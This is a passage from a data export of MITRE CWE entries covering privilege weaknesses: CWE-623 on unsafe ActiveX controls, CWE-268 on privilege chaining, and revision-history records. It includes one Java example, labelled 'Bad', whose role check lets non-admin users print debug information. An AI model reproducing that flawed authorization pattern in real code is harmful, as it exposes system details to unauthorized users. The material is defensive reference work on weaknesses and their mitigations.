{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Unsafe Privilege",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code intends to allow only Administrators to print debug information about a system.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic enum Roles {\n\t\tADMIN,USER,GUEST\n\t}\n\tpublic void printDebugInfo(User requestingUser){\n\t\t\tif(isAuthenticated(requestingUser)){\n\t\t\t\t\tswitch(requestingUser.role){\n\t\t\t\t\t\t\tcase GUEST:\n\t\t\t\t\t\t\t\tSystem.out.println(\"You are not authorized to perform this command\");\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tSystem.out.println(currentDebugState());\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tSystem.out.println(\"You must be logged in to perform this command\");\n\t\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \"GUEST\". Someone with the role of \"ADMIN\" or \"USER\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-127"
}
] | null | null | null | null | 1
|
[
[
"284",
"269",
"267"
]
] |
[
"623"
] |
623
|
Unsafe ActiveX Control Marked Safe For Scripting
|
Variant
|
Simple
|
Draft
|
An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting.
|
This might allow attackers to use dangerous functionality via a web page that accesses the control, which can lead to different resultant vulnerabilities, depending on the control's behavior.
| null | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability"
]
}
] |
[
{
"Description": "During development, do not mark it as safe for scripting.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "After distribution, you can set the kill bit for the control so that it is not accessible from Internet Explorer.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
}
] |
[
{
"Description": "control allows attackers to add malicious email addresses to bypass spam limits",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-0617",
"Reference": "CVE-2007-0617"
},
{
"Description": "web browser uses certain COM objects as ActiveX",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-0219",
"Reference": "CVE-2007-0219"
},
{
"Description": "kiosk allows bypass to read files",
"Link": "https://www.cve.org/CVERecord?id=CVE-2006-6510",
"Reference": "CVE-2006-6510"
}
] | null | null | null |
[
{
"Authors": [
"Microsoft"
],
"Edition": null,
"ExternalReferenceID": "REF-503",
"Publication": null,
"PublicationDay": "13",
"PublicationMonth": "04",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Developing Secure ActiveX Controls",
"URL": "https://learn.microsoft.com/en-us/previous-versions//ms533046(v=vs.85)?redirectedfrom=MSDN",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Microsoft"
],
"Edition": null,
"ExternalReferenceID": "REF-510",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "How to stop an ActiveX control from running in Internet Explorer",
"URL": "https://support.microsoft.com/en-us/help/240797/how-to-stop-an-activex-control-from-running-in-internet-explorer",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 16, \"What ActiveX Components Are Safe for Initialization and Safe for Scripting?\" Page 510",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 12, \"ActiveX Security\", Page 749",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2007-05-07",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2007-05-07",
"SubmissionVersion": "Draft 6",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships, Observed_Example, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Research_Gaps",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "267",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "618",
"Nature": "PeerOf",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] | null | null | null | null | null | null | 1
|
[
[
"284",
"269",
"267",
"623"
]
] |
[] |
268
|
Privilege Chaining
|
Base
|
Simple
|
Draft
|
Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "A user can be given or gain access rights of another user. This can give the user unauthorized access to sensitive information including the access information of another user.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-49",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
},
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-17",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Environment Hardening"
}
] |
[
{
"Description": "Chaining of user rights.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1736",
"Reference": "CVE-2005-1736"
},
{
"Description": "Gain certain rights via privilege chaining in alternate channel.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1772",
"Reference": "CVE-2002-1772"
},
{
"Description": "Application is allowed to assign extra permissions to itself.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1973",
"Reference": "CVE-2005-1973"
},
{
"Description": "\"operator\" user can overwrite usernames and passwords to gain admin privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2003-0640",
"Reference": "CVE-2003-0640"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Privilege Chaining",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null |
[
{
"Authors": [
"Sean Barnum",
"Michael Gegick"
],
"Edition": null,
"ExternalReferenceID": "REF-76",
"Publication": null,
"PublicationDay": "14",
"PublicationMonth": "09",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Least Privilege",
"URL": "https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege",
"URLDate": "2023-04-07"
}
] |
[
{
"Note": "There is some conceptual overlap with Unsafe Privilege.",
"Type": "Relationship"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Other_Notes, Potential_Mitigations, Research_Gaps",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
